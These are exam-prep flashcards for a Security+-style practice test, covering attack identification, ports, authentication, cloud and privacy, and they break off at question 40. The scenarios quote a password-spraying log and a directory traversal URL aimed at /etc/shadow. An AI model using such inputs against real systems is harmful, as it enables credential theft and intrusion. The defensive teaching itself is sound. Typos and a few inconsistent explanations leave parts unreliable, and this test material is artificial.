Practice Exam 01 Flashcards

1
Q

A cybersecurity analyst is reviewing the logs of an authentication server and saw the following output:

[443] [https-get-form] host: diontraining.com login: admin password: P@$$w0rd!
[443] [https-get-form] host: diontraining.com login: admin password: C0mpT1@P@$$w0rd
[443] [https-get-form] host: diontraining.com login: root password: P@$$w0rd!
[443] [https-get-form] host: diontraining.com login: root password: C0mpT1@P@$$w0rd
[443] [https-get-form] host: diontraining.com login: dion password: P@$$w0rd!
[443] [https-get-form] host: diontraining.com login: dion password: C0mpT1@P@$$w0rd
[443] [https-get-form] host: diontraining.com login: json password: P@$$w0rd!
[443] [https-get-form] host: diontraining.com login: json password: C0mpT1@P@$$w0rd

What type of attack was most likely being attempted by the attacker?

a. Session hijacking
b. Impersonation
c. Password spraying
d. Credential stuffing

A

c. Password spraying

OBJ-1.2: Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. We can use multiple iterations using a number of different passwords, but the number of passwords attempted is usually low when compared to the number of users attempted. This method avoids password lockouts, and it is often more effective at uncovering weak passwords than targeting specific users. In the scenario provided, there are only one or two attempts being made to each username listed. This is indicative of a password spraying attack instead of a brute force attempt against a single user. Impersonation is the act of pretending to be another person for the purpose of fraud. Credential stuffing is the automated injection of breached username/password pairs in order to fraudulently gain access to user accounts. This is a subset of the brute force attack category: large numbers of spilled credentials are automatically entered into websites until they are potentially matched to an existing account, which the attacker can then hijack for their own purposes. Session hijacking is the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Which of the following is the leading cause for cross-site scripting, SQL injection, and XML injection attacks?

a. Faulty input validation
b. Directory traversals
c. Output encoding
d. File inclusions

A

a. Faulty input validation

OBJ-3.2: A primary vector for attacking applications is to exploit faulty input validation. The input could include user data entered into a form or URL, passed by another application or link. This is heavily exploited by cross-site scripting, SQL injection, and XML injection attacks. Directory traversal is the practice of accessing a file from a location that the user is unauthorized to access. The attacker does this by ordering an application to backtrack through the directory path so that the application reads or executes a file in a parent directory. In a file inclusion attack, the attacker adds a file to the running process of a web app or website. The file is either constructed to be malicious or manipulated to serve the attacker’s malicious purposes. Cross-site scripting (XSS) is one of the most powerful input validation exploits. XSS involves a trusted site, a client browsing the trusted site, and the attacker’s site.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Which of the following attacks would most likely be used to create an inadvertent disclosure of information from an organization’s database?

a. SQL injection
b. Buffer overflow
c. Cross-site scripting
d. Denial of service

A

a. SQL injection

OBJ-1.3: A SQL injection poses the most direct and more impactful threat to an organization’s database. A SQL injection could allow the attacker to execute remote commands on the database server and lead to the disclosure of sensitive information. A buffer overflow attack attempts to overwrite the memory buffer in order to send additional data into adjacent memory locations. A buffer overflow attack might target a database server, but it isn’t intended to cause a disclosure of information directly. Instead, a buffer overflow attack may be used to gain initial access to a server and allow for the running of other malicious code. A denial of service targets the availability of the information by attempting to take the server offline. A cross-site scripting attack typically is focused against the user, not the server or database.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

You have run finished running an nmap scan on a server are see the following output :

nmap diontraning.com

Starting Nmap (http://nmap.org)
Nmap scan report for diontranining.com (64.13.134.52)
Not shown : 996 filtered ports

PORT STATE
22/tcp open
23/tcp open
53/tcp open
443/tcp open

Namp done : 1 IP address (1 host up) scanned in 2.56 seconds

Based on the output above, which of the following ports listed as open represents the most significant security vulnerability to your network?

a. 22
b. 53
c. 443
d. 23

A

d. 23

OBJ-3.1: Port 23 is used by telnet and is not considered secure because it sends all of its data in cleartext, including authentication data like usernames and passwords. As an analyst, you should recommend that telnet is disabled and blocked from use. The other ports that are open are for SSH (port 22), DNS (port 53), and HTTPS (port 443).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Which type of authentication method is commonly used with physical access control systems and relies upon RFID devices embedded into a token?

a. HOTP
b. Proximity cards
c. TOTP
d. Smart cards

A

b. Proximity cards

OBJ-2.7: A proximity card is a contactless card that usually utilizes RFID to communicate with the reader on a physical access system. These are commonly used to access secured rooms (such as server rooms) or even a building itself (such as at a mantrap). Some smart cards contain proximity cards within them, as well, but the best answer to this question is proximity cards since that is the function the smart card would be used to meet the requirements of this scenario.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Review the following packet captured at your NIDS:

23:12:23.154234 IP 86.18.10.3:54326 > 71.168.10.45:3389
Flags [P.], Seq 1834:1245, ack1, win 511, options
[nop, nop, TS val 263451334 erc 482862734, length 125

After reviewing the packet above, you discovered there is an unauthorized service running on the host. Which of the following ACL entries should be implemented to prevent further access to the unauthorized service while maintaining full access to the approved services running on this host?

a. DENY IP HOST 86.18.10.3 EQ 3389
b. DENY IP HOST 71.168.10.45 ANY EQ 25
c. DENY TCP ANY HOST 71.168.10.45 EQ 3389
b. DENY TCP ANY HOST 86.18.10.3 EQ 25

A

c. DENY TCP ANY HOST 71.168.10.45 EQ 3389

OBJ-4.4: Since the question asks you to prevent access to the unauthorized service, we need to block port 3389 from accepting connections on 71.168.10.45 (the host). This option will deny ANY workstation from connecting to this machine (host) over the Remote Desktop Protocol service that is unauthorized (port 3389).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Your company just installed a new webserver within your DMZ. You have been asked to open up the port for secure web browsing on the firewall. Which port should you set as open to allow users to access this new server?

a. 80
b. 443
c. 143
d. 21

A

b. 443

OBJ-3.1: Port 443 is used for HTTPS traffic. Therefore, this port must be opened. This is secure web browsing over SSL or TLS. Port 21 is used for the File Transfer Protocol (FTP). Port 80 is used for unsecured web browsing (HTTP). Port 143 is used for Internet Mail Application Protocol (IMAP).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, http://test.diontraining.com/../../../../etc/shadow. What type of attack has likely occurred?

a. Directory traversal
b. Buffer overflow
c. SQL injection
d. XML injection

A

a. Directory traversal

OBJ-1.3: This is an example of a directory traversal. A directory traversal attack aims to access files and directories that are stored outside the webroot folder. By manipulating variables or URLs that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location. XML Injection is an attack technique used to manipulate or compromise the logic of an XML application or service. SQL injection is the placement of malicious code in SQL statements, via web page input.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Which of the following type of digital forensic investigations is most challenging due to the on-demand nature of the assets being analyzed?

a. On-premise servers
b. Mobile devices
c. Cloud services
d. Employee workstations

A

c. Cloud services

OBJ-4.5: The on-demand nature of cloud services means that instances are often created and destroyed again, with no real opportunity for forensic recovery of any data. Cloud providers can mitigate this to some extent by using extensive logging and monitoring options. A CSP might also provide an option to generate a file system and memory snapshots from containers and VMs in response to an alert condition generated by a SIEM. Employee workstations are often the easiest to conduct forensics on since they are a single-user environment for the most part. Mobile devices have some unique challenges due to their operating systems, but there are good forensic tool suites available to ease the forensic acquisition and analysis of mobile devices. On-premise servers are more challenging that a workstation to analyze, but they do not suffer from the same issues as cloud-based services and servers.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

When your credit card data is written to the customer invoicing system at Dion Training, the first 12 digits are replaced with an x before storing the data. Which of the following privacy methods is being used?

a. Data minimization
b. Data masking
c. Anonymization
d. Tokenization

A

b. Data masking

OBJ-5.5: Data masking can mean that all or part of the contents of a field is redacted, by substituting all character strings with x, for example. Tokenization means that all or part of data in a field is replaced with a randomly generated token. The token is stored with the original value on a token server or token vault, separate from the production database. An authorized query or app can retrieve the original value from the vault, if necessary, so tokenization is a reversible technique. Data minimization involves limiting data collection to only what is required to fulfill a specific purpose. By reducing what information is collected, it reduces the amount and type of information that must be protected. Data anonymization is the process of removing personally identifiable information from a data set so that the people whom the data describe remain anonymous.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

(Sample Simulation – On the real exam for this type of question, you would receive 3-5 pictures and be asked to drag and drop them into place next to the correct term.)

(a person holding a mobile phone texting)

Which of the following types of attacks occurs when an attacker sends unsolicited messages over Facebook messenger?

a. Spear phishing
b. Spamming
c. Pharming
d. Phishing
e. Spimming

A

e. Spimming

OBJ-1.1: Spim is a type of spam targeting users of instant messaging (IM) services, SMS, or private messages within websites and social media. If the unsolicited messages were sent by email, they would have instead been classified as Spam.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

You have been asked to write a new security policy to reduce the risk of employees working together to steal information from the Dion Training corporate network. Which of the following policies should you create to counter this threat?

a. Privacy policy
b. Least privilege policy
c. Mandatory vacation policy
d. Acceptable user policy

A

c. Mandatory vacation policy

OBJ-5.3: A mandatory vacation policy requires that all users take time away from work to enjoy a break from the day to day rountine of their jobs. But, there is a major side benefit to mandatory vacations in regards to your company’s security posture. By requiring mandatory vacations, it will require the company to have another employee fill in for the vacationing employee’s normal roles and responsibilities. By doing this, the employee who is filling in might come across fraud, abuse, or theft that the vacationing employee is a part of. The concept of least privilege may not stop this theft from occurring, since two employees could work together to steal information that each of them has access to as part of their job. Also, acceptable use simply outlines the types of activities that are allowed and not allowed; it won’t prevent theft from occurring. A privacy policy discusses how information should be properly stored and secured, but this won’t stop an employee from stealing information or detecting if the information was stolen.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

(Sample Simulation – On the real exam for this type of question, you would have to rearrange the ports into the proper order by dragging and dropping them into place.)

  1. RDP
  2. L2TP
  3. LDAP
  4. Kerberos

1701
3389
88
389

Using the image provided, place the port numbers in the correct order with their associated protocols:

a. 3389, 1701, 389, 88
b. 88, 389, 3389, 1701
c. 1701, 3389, 88, 389
d. 389, 88, 1701, 3389

A

a. 3389, 1701, 389, 88

OBJ-3.1: For the exam, you need to know your ports and protocols. The Remote Desktop Protocol (RDP) operates over port 3389. Layer 2 Tunneling Protocol (L2TP) operates over port 1701. The Lightweight Directory Access Protocol (LDAP) operates over port 389. Kerberos operates over port 88.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Your company just launched a new invoicing website for use by your five largest vendors. You are the cybersecurity analyst and have been receiving numerous phone calls that the webpage is timing out, and the website overall is performing slowly. You have noticed that the website received three million requests in just 24 hours, and the service has now become unavailable for use. What do you recommend should be implemented to restore and maintain the availability of the new invoicing system?

a. VPN
b. MAC filtering
c. Intrusion Detection System
d. Whitelisting

A

d. Whitelisting

OBJ-3.2: By implementing whitelisting of the authorized IP addresses for the five largest vendors, they will be the only ones who will be able to access the webserver. This can be done by creating rules in the Access Control List (ACL) to deny ALL other users except these five vendors, thereby dropping a large number of requests from any other IP addresses, such as those from an attacker. Based on the description in the scenario, it appears like the system is under some form of denial of service attack, but by implementing a whitelist at the edge of the network and blackholing any traffic from IP addresses that are not whitelisted, the server will no longer be overwhelmed or perform slowly to respond to legitimate requests. MAC filtering is only applicable at layer 2 of the OSI model (which would not work for traffic being sent over the internet from your vendors to your server). A VPN is a reasonable solution to help secure the connection between the vendors and your systems, but it will not deal with the DoS condition being experienced. An intrusion detection system may detect the DoS condition, but an IDS cannot resolve the condition (whereas an IPS could).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

Dion Training’s offices utilize an open concept floor plan. They are concerned that a visitor might attempt to steal an external hard drive and carry it out of the building. To mitigate this risk, the security department has recommended installing security cameras that are clearly visible to both employees and visitors. What type of security control do these cameras represent?

a. Compensating
b. Administrative
c. Deterrent
d. Corrective

A

c. Deterrent

OBJ-2.7: A deterrent control is designed to discourage the violation of a security policy. Since the cameras are clearly visible, they are acting as a deterrent control. A corrective control is one that is used to fix or eliminate a vulnerability. A compensating control is used to minimize a vulnerability when it is deemed too difficult or impractical to fully correct the vulnerability. An administrative control is used to create a policy or procedure to minimize or eliminate a vulnerability.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Nicole’s organization does not have the budget or staff to conduct 24/7 security monitoring of their network. To supplement her team, she contracts with a managed SOC service. Which of the following services or providers would be best suited for this role?

a. PaaS
b. MSSP
c. SaaS
d. IaaS

A

b. MSSP

OBJ-2.2: A managed security service provider (MSSP) provides security as a service (SECaaS). IaaS, PaaS, and SaaS (infrastructure, platform, and software as a service) do not include security monitoring as part of their core service offerings. Security as a service or a managed service provider (MSP) would be better suited for this role. This question may seem beyond the scope of the exam, but the objectives allow for “other examples of technologies, processes, or tasks pertaining to each objective may also be included on the exam although not listed or covered” in the bulletized lists of the objectives. The exam tests the equivalent to 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of all the content of this examination. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess and move on!

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

Dion Training has a $15,000 server that has been crashing frequently. Over the past 12 months, the server has crashed 10 times, requiring the server to be rebooted in order to recover from the crash. Each time, this has resulted in a 5% loss of functionality or data. Based on this information, what is the Annual Loss Expectancy (ALE) for this server?

a. $1,500
b. $15,000
c. $7,500
d. $2,500

A

c. $7,500

OBJ-5.4: To calculate the ALE, you need to multiple the Single Loss Expectancy (SLE) by the Annual Rate of Occurrence (ARO). The SLE is calculated by multiplying the Exposure Factor (EF) by the Asset Value (AV). Therefore, SLE = EF x AV, and ALE = SLE x ARO. For this scenario, the asset value is $15,000, the annual rate of occurrence is 10 times per year, and the exposure factor is 5% (or 0.05). To calculate the SLE, SLE = 0.05 x $15,000 = $750. Therefore, the ALE = SLE x ARO = $750 x 10 = $7,500.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

Marta’s organization is concerned with the vulnerability of a user’s account being vulnerable for an extended period of time if their password was compromised. Which of the following controls should be configured as part of their password policy to minimize this vulnerability?

a. Minimum password length
b. Password complexity
c. Password expiration
d. Password history

A

c. Password expiration

OBJ-3.7: A password expiration control in the policy would force users to change their password at specific intervals of time. This will then locks out a user who types in the incorrect password or create an alter that the user’s account has been potentially compromised. While the other options are good components of password security to prevent an overall compromise, they are not effective against the vulnerability described in this particular scenario, as it states the issue is based on time. Password history is used to determine the number of unique passwords a user must use before they can use an old password again. The Passwords must meet complexity requirements policy setting determines whether passwords must meet a series of guidelines that are considered important for a strong password. Maximum password length creates a limit to how long the password can be, but a longer password is considered stronger against a brute force attack.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

As a cybersecurity analyst conducting vulnerability scans, you have just completed your first scan of an enterprise network comprising over 10,000 workstations. As you examine your findings, you note that you have less than 1 critical finding per 100 workstations. Which of the following statement does BEST explain these results?

a. The scanner was not compatible with the devices on your network
b. The network has an exceptionally strong security posture
c. An uncredentialed scan of the network was performed
d. The scanner failed to connect with the majority of workstations.

A

c. An uncredentialed scan of the network was performed

OBJ-1.7: Uncredentialed scans are generally unable to detect many vulnerabilities on a device. When conducting an internal assessment, you should perform an authenticated (credentialed) scan of the environment to most accurately determine the vulnerability posture of the network. In most enterprise networks, if a vulnerability exists on one machine, it also exists on most of the other workstations since they use a common baseline or image. If the scanner failed to connect to the workstations, an error would have been generated in the report.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

Maria is trying to log in to her company’s webmail and is asked to enter her username and password. Which type of authentication method is Maria using?

a. RADIUS
b. Multifactor
c. TACACS+
d. Single-factor

A

d. Single-factor

OBJ-2.4: Single-factor authentication (SFA) is a process for securing access to a given system, such as a network or website, that identifies the party requesting access through only one category of credentials (something you know, something you have, something you are, or something you do). The most common example of single-factor authentication occurs when a user is prompted to enter their username and password in order to authenticate.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

You work for a bank that is interested in moving some of its operations to the cloud, but it is worried about security. You recently discovered an organization called CloudBank that was formed by 15 local banks as a way for them to build a secure cloud-based environment that can be accessed by the 15 member banks. Which cloud model BEST describes the cloud created by CloudBank?

a. Public cloud
b. Hybrid cloud
c. Private cloud
d. Community cloud

A

d. Community cloud

OBJ-2.2: Community Cloud is another type of cloud computing in which the setup of the cloud is shared manually among different organizations that belong to the same community or area. A multi-tenant setup is developed using cloud among different organizations that belong to a particular community or group having similar computing concerns. For joint business organizations, ventures, research organizations, and tenders, a community cloud is an appropriate solution. Based on the description of 15 member banks coming together to create the CloudBank organization and its cloud computing environment, a community cloud model is most likely being described.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

What role does the red team perform during a tabletop exercise (TTX)?

a. Network defender
b. Cybersecurity analyst
c. System administrator
d. Adversary

A

d. Adversary

OBJ-4.2: The red team acts as the adversary, attempting to penetrate the network or exploit the network as a rogue internal attacker. The red team might be selected members of in-house security staff or might be a third-party company or consultant contracted to perform the role. The blue team operates the security system with a focus on detecting and repelling the red team. The blue team usually consists of system administrators, cybersecurity analysts, and network defenders.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

Chris just downloaded a new third-party email client for his smartphone. When Chris attempts to log in to his email with his username and password, the email client generates an error messaging stating that “Invalid credentials” were entered. Chris assumes he must have forgotten his password, so he resets his email’s username and password and then reenters them into the email client. Again, Chris receives an “Invalid credentials” error. What is MOST likely causing the “Invalid credentials” error in regard to Chris’s email client?

a. His smartphone has full device encryption enabled
b. His email account requires a strong password to be used
c. His email account requires multifactor authentication
d. His email account is locked out

A

c. His email account requires multifactor authentication

OBJ-2.4: If a user or system has configured their email accounts to require two-factor authentication (2FA) or multifactor authentication, then even if they enter their username and password correctly in the third-party email client, they will receive the “Invalid credentials” error message. Some email servers will allow the user to create an Application Specific Password to bypass the multifactor authentication requirement to overcome this, or the user will have to use an email client that supports multifactor authentication.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

Which of the following is not normally part of an endpoint security suite?

a. VPN
b. Software firewall
c. Anti-virus
d. IPS

A

a. VPN

OBJ-3.2: Endpoint security includes software host-based firewalls, host-based intrusion protection systems (HIPS), and anti-virus software. A VPN is not typically considered an endpoint security tool because it is a network security tool.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q

Which of the following items represents a document that includes detailed information on when an incident was detected, how impactful the incident was, how it was remediated, the effectiveness of the incident response, and any identified gaps that might require improvement?

a. Chain of custody report
b. Forensic analysis report
c. Lessons learned report
d. Trends analysis report

A

c. Lessons learned report

OBJ-4.2: The lessons learned report provides you with the details of the incident, its severity, the remediation method, and, most importantly, how effective your response was. Additionally, it provides recommendations for improvements in the future. A forensic analysis report would not provide recommendations for future improvements, even though it provides many of the other details. A trend analysis report describes whether behaviors have increased, decreased, or stayed the same over time. Chain of custody report is the chronological documentation or paper trail that records the sequence of custody, control, transfer, analysis, and disposition of physical or electronic evidence.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q

Your company explicitly obtains permission from its customers to use their email address as an account identifier in its CRM. Max, who works at the marketing department in the company’s German headquarters, just emailed all of the customers to let them know about a new sales promotion this weekend. Which of the following privacy violations has occurred, if any?

a. There was a privacy violation since data minimization policies were not followed properly
b. There was a privacy violation since the customer’s explicitly gave permissions to use the email address as an identifier and did not consent to receiving marketing emails.
c. There was no privacy violation since the customer’s were emailed securely through the customer relationship management tool
d. There was no privacy violation because only corporate employees had access to their email addresses.

A

b. There was a privacy violation since the customer’s explicitly gave permissions to use the email address as an identifier and did not consent to receiving marketing emails.

OBJ-5.2: According to the European Union’s General Data Protection Regulation (GDPR), personal data collected can only be used for the exact purpose in which explicit consent was obtained. In order to use email addresses for marketing purposes, a separate explicit consent should have been obtained. Since the company operates in Germany, it must follow the GDPR privacy standard. Even if a company doesn’t operate within the European Union, its customers might be European Union citizens, and therefore the company should still optional follow the GDPR guidelines. While data minimization is a good internal policy to utilize, not following it doesn’t equate to a privacy violation or breach. Data minimization is the principle that data should only be processed and stored if that is necessary to perform the purpose for which it is collected. The option concerning the customer relationship management (CRM) tool is a distractor since the issue is the use of the data in ways that were not consented to by the customer, not which system the email was actually sent through. A privacy violation can occur when data is viewed by corporate employees if those employees do not have a need to know, a valid business requirement to use the data, or consent from the customer to use the data for the specific purpose (as was the case in this scenario).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q

Which of the following cryptographic algorithms is classified as asymmetric?

a. 3DES
b. AES
c. RC4
d. PGP

A

d. PGP

OBJ-2.8: Pretty Good Privacy (PGP) is an encryption program that provides cryptographic privacy and authentication for data communication. PGP is used for signing, encrypting, and decrypting texts, emails, files, directories, and whole disk partitions and to increase the security of email communications. PGP is a public-key cryptosystem and relies on an asymmetric algorithm. AES, RC4, and 3DES are all symmetric algorithms.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q

You are reviewing a rule within your organization’s IDS. You see the following output:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any msg: “BROWSER-IE Microsoft Internet Explorer CacheSize exploit attempt”;
flow: to_client, established;
file_data;
content: “recordset”; offset:14; depth:9;
content:”.CcheSize”; distnace:0; within:100;
pcre:”/CacheSize\s=\s/”;
byte_test:10,>,0xffffffe,0,relative,string;
max-detect-ips drop, service http;
reference:cve,2016-8077;
classtype: attempted-user;
sid:65535;rev:1;

Based on this rule, which of the following malicious packets would this IDS alert on?

a. Any malicious inbound packets
b. An malicious inbound TCP packet
c. Any malicious outbound packets
d. An malicious outbound TCP packet

A

b. An malicious inbound TCP packet

OBJ-3.3: The rule header is set to alert only on TCP packets based on the first line of this IDS rule. The flow condition is set as “to_client, established”, which means that only inbound traffic will be analyzed against this rule and only inbound traffic for connections that are already established. Therefore, this rule will alert on an inbound malicious TCP packet only when the packet matches all the conditions listed in this rule. This rule is an example of a Snort IDS rule. For the exam, you do not need to be able to create your own IDS rules, but you should be able to read them and pick out generic content like the type of protocol covered by the signature, the port be analyzed, and the direction of flow.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q

What is a reverse proxy commonly used for?

a. Allowing access to a virtual private cloud
b. Directing traffic to internal services if the contents of the traffic comply with the policy
c. To prevent the unauthorized use of cloud services from the local network
d. To obfuscate the origin of a user within a network

A

b. Directing traffic to internal services if the contents of the traffic comply with the policy

OBJ-2.1: A reverse proxy is positioned at the cloud network edge and directs traffic to cloud services if the contents of that traffic comply with the policy. This does not require the configuration of the users’ devices. This approach is only possible if the cloud application has proxy support. You can deploy a reverse proxy and configure it to listen for client requests from a public network, like the internet. The proxy then creates the appropriate request to the internal server on the corporate network and passes the response from the server back to the external client. They are not generally intended to obfuscate the source of communication, nor are they necessarily specific to the cloud. A cloud access security broker (CASB) can be used to prevent unauthorized use of cloud services from the local network.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
30
Q

You have signed up for a web-based appointment scheduling application to help you manage your new IT technical support business. What type of solution would this be categorized as?

a. PaaS
b. DaaS
c. IaaS
d. SaaS

A

d. SaaS

OBJ-2.2: Software as a Service (SaaS) is used to provide web applications to end-users. This can be a calendar, scheduling, invoicing, word processor, database, or other programs. For example, Google Docs and Officer 365 are both word processing SaaS solutions. QuickBooks Online is one example of a SaaS solution for accounting.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q

(Sample Simulation – On the real exam for this type of question, you would receive 3-5 pictures and be asked to drag and drop them into place next to the correct term.)

A picture of someone hold a mobile phone with finger print authentication

How would you appropriately categorize the authentication method being displayed here?

a. Multifactor authentication
b. PAP authentication
c. One-time password authentication
d. Biometric authentication

A

d. Biometric authentication

OBJ-2.4: For the exam, you need to know the different categories of authentication and what type of authentication methods belong to each category. A fingerprint scan would be categorized as biometric authentication. Biometric authentications include any authentication system that relies on one or more physical characteristics of a person for authentication.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
32
Q

Which of the following authentication mechanisms involves receiving a one-time use shared secret password, usually through a token-based key fob or smartphone app, that automatically expires after a short period of time (for example, 60 seconds)?

a. Smart card
b. TOTP
c. EAP
d. HOTP

A

b. TOTP

OBJ-2.4: The Time-based One-time Password Algorithm (TOTP) is a refinement of the HOTP. One issue with HOTP is that tokens can be allowed to persist unexpired, raising the risk that an attacker might be able to obtain one and decrypt data in the future. In TOTP, the HMAC is built from the shared secret plus a value derived from the device’s and server’s local timestamps. TOTP automatically expires each token after a short window (60 seconds, for instance).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
33
Q

Which analysis framework makes no allowance for an adversary retreat in its analysis?
a. Diamond Model of Instruction Analysis
b. MITRE ATT&CK framework
c. Lockheed Martin cyber kill chain
d. AlienValue (AT&T Cybersecurity) Cyber Kill Chain

A

c. Lockheed Martin cyber kill chain

OBJ-4.2: The Lockheed Martin cyber kill chain implicitly assumes a unidirectional workflow. Therefore, it fails to consider that an adversary may retreat during an attack. MITRE and Diamond’s models are more dynamic systems that allow for a broader range of adversary behaviors. AlienVault was specifically designed to avoid the rigidity of the Lockheed Martin cyber kill chain.

34
Q

What technique is most effective in determining whether or not increasing end-user security training would be beneficial to the organization during your technical assessment of their network?

a. Vulnerability scanning
b. Network sniffing
c. Social engineering
d. Application security testing

A

c. Social engineering

OBJ-5.3: Social engineering refers to psychological manipulation of people into performing actions or divulging confidential information. During your technical assessment, utilizing social engineering techniques such as phishing or pharming can help you determine if additional end-user security training should be included in the organization. The other three options focus solely on technical controls. Therefore adding end-user training would have no effect on these technology options.

35
Q

Dion Training is building a new data center. The group designing the facility has decided to provide additional HVAC capacity to ensure the data center maintains a consistently low temperature. Which of the following is the most likely benefit that will be achieved by increasing the designed HVAC capacity?

a. Longer UPS run time due to increased airflow
b. Higher data integrity due to more efficient SSD cooling
c. Increase the availability of network services due to higher throughput
d. Longer MTBF of hardware due to lower operating temperatures.

A

d. Longer MTBF of hardware due to lower operating temperatures.

OBJ-5.4: The mean time between failure (MTBF) is the measure of the anticipated rate of failure for a system or component. This is effectively a measurement of the component’s expected lifespan. If the HVAC capacity is increased, the server room can maintain a cooler temperature range. Datacenters produce a lot of heat from the equipment being operated. Excessive heat can damage components and cause premature hardware failure. Therefore, increasing the HVAC capacity and airflow can lead to longer lifespans for servers and networking equipment.

36
Q

An employee contacts the service desk because they are unable to open an attachment they receive in their email. The service desk agent conducts a screen sharing session with the user and investigates the issue. The agent notices that the attached file is named Invoice1043.pdf, and a black pop-up window appears and then disappears quickly when the attachment was double-clicked. Which of the following is most likely causing this issue?

a. The file contains an embedded link to a malicious website
b. The attachment is using a double file extension to mask its identity
c. The user doesn’t have a PDF reader installed on their computer
d. The email is a form of spam and should be deleted.

A

b. The attachment is using a double file extension to mask its identity

OBJ-1.1: The message contains a file attachment in the hope that the user will execute or open it. The nature of the attachment might be disguised by formatting tricks such as using a double file extension, such as Invoice1043.pdf.exe, where the user only sees the first extension since .exe is a known file type in Windows. This would explain the black pop-up window that appears and then disappeared, especially if the exe file was running a command-line tool. This file is most likely not a PDF, so there is no need for a PDF reader. Additionally, most modern web browsers, such as Chrome and Edge, can open PDF files by default for the user. The file would not contain an embedded link since an embedded link is another popular attack vector that embeds a link to a malicious site within the email body, not within the file. This email is likely not spam and would be better categorized as a phishing attempt instead.

37
Q

If you are unable to ping a target because you are receiving no response or a response that states the destination is unreachable, then ICMP may be disabled on the remote end. If you wanted to try to elicit a response from a host using TCP, what tool would you use?

a. Traceroute
b. TCP ping
c. Broadcast ping
d. Hping

A

d. Hping

OBJ-4.1: Hping is a handy little utility that assembles and sends custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired by the ping command but offered far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. Hping is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. This often allows you to map out firewall rule sets. It is also great for learning more about TCP/IP and experimenting with IP protocols. Hping does not support IPv6, though, so the creators of NMAP have created Nping to fill this gap and serve as an updated variant of Hping. Traceroute and tracert are computer network diagnostic commands for displaying the route and measuring transit delays of packets across an Internet Protocol network. Traceroute uses icmp and not TCP. Broadcast ping is simply pinging the broadcast IP of the subnet using the ping command, but if a regular ping does not work, neither will a broadcast ping. Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies. This is used as a covert channel, not as a method of eliciting a response from a host using TCP.

38
Q

Which party in a federation provides services to members of the federation?

a. SSO
b. RP
c. SAML
d. IdP

A

b. RP

OBJ-2.4: Relying parties (RPs) provide services to members of a federation. An identity provider (IdP) provides identities, makes assertions about those identities, and releases information about the identity holders. The Security Assertion Markup Language (SAML) is an open standard for exchanging authentication and authorization data between parties between an identity provider and a service provider (SP) or relaying party (RP). Single sign-on (SSO) is an authentication scheme that allows a user to log in with a single ID and password to any of several related yet independent software systems across a federation. SAML and SSO are not parties. Therefore, they cannot possibly be the right answer to this question.

39
Q

James, a programmer at Apple Computers, is surfing the internet on his lunch break. He comes across a rumor site that is focused on providing details of the upcoming iPhone being released in a few months. James knows that Apple likes to keep its product details a secret until it is publicly announced. As James is looking over the website, he sees a blog post with an embedded picture of a PDF containing detailed specifications for the next iPhone and labeled as “Proprietary Information – Internal Use Only.” The new iPhone is still several months away from release. What should James do next?

a. Contact his team lead and ask what he should do next
b. Contact the service desk or incident response team to determine what to do next
c. Reply to the blog post and deny the accuracy of the specifications
d. Contact the website’s owner and request they take down the PDF

A

b. Contact the service desk or incident response team to determine what to do next

OBJ-5.5: This is an example of either a data leak or a data breach. James is not sure how the website got the details of the product’s specifications. Therefore, he should follow his organizational procedures for notification that internal company information has been leaked to the internet. In most organizations, the service desk acts as the single point of contact for all IT issues (even possible data breaches), and they can refer James to the incident response team (if one is currently stood up). Since James works as a programmer, it is unlikely that his team lead is responsible for handling a data leak or data breach, so it is better to contact the service desk first. James should not contact the website directly nor reply to the blog post. Instead, he should leave the response actions to the security team and the incident response team.

40
Q

Which of the following is the LEAST secure wireless security and encryption protocol?

a. WPA
